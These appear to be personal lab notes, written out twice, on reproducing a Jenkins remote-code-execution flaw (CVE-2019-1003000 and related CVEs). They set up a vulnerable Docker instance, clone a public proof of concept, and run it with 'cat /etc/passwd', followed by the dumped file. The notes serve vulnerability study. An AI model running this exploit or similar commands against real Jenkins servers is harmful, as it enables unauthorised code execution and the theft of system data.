milo2012/exploit_notes_Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002.txt

## exploit_notes_Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002.txt
Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002

#Install vulnerable docker version of Jenkins
$ docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.121.2
- Go to http://127.0.0.1:8080
- Install suggested plugins
- Create a user account (admin|admin)
- Click "New Item"
- Under Item Name, enter 'Helloworld', choose 'Pipeline' and click 'OK'
- Under 'Pipeline', untick 'Use Groovy Sandbox' and click 'Save'

#Install Scripts to Exploit Vulnerability
$ git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git
$ cd cve-2019-1003000-jenkins-rce-poc
$ pip install -r requirements.txt

#Run Exploit and wait for results
$ python exploit.py --url http://127.0.0.1:8080 --job Helloworld --username admin --password admin --cmd "cat /etc/passwd"
[+] connecting to jenkins...
[+] crafting payload...
[+] modifying job with payload...
[+] putting job build to queue...
[+] waiting for job to build...
[+] restoring job...
[+] fetching output...
[+] OUTPUT:
Started by user admin
Running in Durability level: MAX_SURVIVABILITY
[Pipeline] Start of Pipeline
[Pipeline] echo
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
[Pipeline] End of Pipeline
Finished: SUCCESS
	Exploit Notes: CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002

	#Install vulnerable docker version of Jenkins
	$ docker run -p 8080:8080 -p 50000:50000 jenkins/jenkins:2.121.2
	- Go to http://127.0.0.1:8080
	- Install suggested plugins
	- Create a user account (admin\|admin)
	- Click "New Item"
	- Under Item Name, enter 'Helloworld', choose 'Pipeline' and click 'OK'
	- Under 'Pipeline', untick 'Use Groovy Sandbox' and click 'Save'

	#Install Scripts to Exploit Vulnerability
	$ git clone https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc.git
	$ cd cve-2019-1003000-jenkins-rce-poc
	$ pip install -r requirements.txt

	#Run Exploit and wait for results
	$ python exploit.py --url http://127.0.0.1:8080 --job Helloworld --username admin --password admin --cmd "cat /etc/passwd"
	[+] connecting to jenkins...
	[+] crafting payload...
	[+] modifying job with payload...
	[+] putting job build to queue...
	[+] waiting for job to build...
	[+] restoring job...
	[+] fetching output...
	[+] OUTPUT:
	Started by user admin
	Running in Durability level: MAX_SURVIVABILITY
	[Pipeline] Start of Pipeline
	[Pipeline] echo
	root:x:0:0:root:/root:/bin/bash
	daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
	bin:x:2:2:bin:/bin:/usr/sbin/nologin
	sys:x:3:3:sys:/dev:/usr/sbin/nologin
	sync:x:4:65534:sync:/bin:/bin/sync
	games:x:5:60:games:/usr/games:/usr/sbin/nologin
	man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
	lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
	mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
	news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
	uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
	proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
	www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
	backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
	list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
	irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
	gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
	nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
	_apt:x:100:65534::/nonexistent:/bin/false
	jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
	[Pipeline] End of Pipeline
	Finished: SUCCESS